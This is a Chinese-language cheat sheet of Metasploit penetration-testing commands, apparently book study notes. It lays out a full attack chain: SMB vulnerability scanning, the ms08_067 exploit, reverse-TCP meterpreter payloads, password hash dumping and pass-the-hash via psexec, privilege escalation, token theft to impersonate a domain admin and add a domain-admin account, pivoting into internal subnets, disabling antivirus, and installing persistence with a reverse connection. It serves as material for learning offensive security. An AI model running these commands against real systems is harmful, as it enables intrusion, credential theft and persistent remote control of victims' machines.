文章目录
渗透攻击之旅
渗透攻击基础
- Metasploit框架中包含数百个模块,在MSF终端中运行show命令可以把所有模块显示出来。
- 命令:
show exploits
显示所有可用的渗透攻击模块
show auxiliary
显示所有的辅助模块以及它们的用途
show options
显示各个模块正确运行所需的各种设置。
show payloads
显示与当前模块兼容的攻击载荷。
show targets
显示收到漏洞影响目标系统的类型
渗透流程
nmap -sT -A --script=smb-check-vulns =Po xx.xx.xx.xx
search ms08_067_netapi
全端口攻击载荷:暴力猜解目标开放的端口
set payload windows/meterpreter/reverse_tcp_allports
Meterpreter
screeshot
截屏
sysinfo
获取系统运行的平台
ps
获取目标系统正在运行的进程
migrate 1668
将会话迁移至其他进程空间
挖掘用户名和密码
- 提取密码哈希值
use priv
run post/windows/gather/hashdump
- 传递哈希值
use windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost 11.11.11.11
set lport 443
set rhost 11.11.11.11
set SMBPass aaddxxxxxxxx
exploit
权限提升
use priv
getsystem
getuid
令牌假冒
ps
steal_token 380
380是PID参数use incognito
通过这个命令加载incognito模块list_tokens -u
impersonate_token SNEAKS.IN\\ihazdomainadmin
add_user join 123456 -h 192.168.33.50
添加新用户add_group_user "Domain Admins" join -h 192.168.33.50
赋予管理员权限
通过跳板攻击其他机器
run get_local_subnets
run autoroute -s 192.168.33.0/24
- 使用
arp_sweep
辅助模块对内网存活主机进行扫描
使用Meterpreter脚本
run vnc
在远程系统上安装VNC会话run screen_unlock
这里将得到目标主机的VNC图形界面接口run post/windows/manage/migrate
迁移进程run killav
关闭杀毒软件run hashdump
获取系统密码哈希值run packetrecorder -i 1
查看目标机上的所有流量run scraper
攫取系统信息run persistence -X -i 50 -p 443 -r 192.168.33.129
向后渗透模块转变
run post/windows/gather/hashdump
获取密码哈希值
将命令行shell升级为Meterpreter
sessions -u 1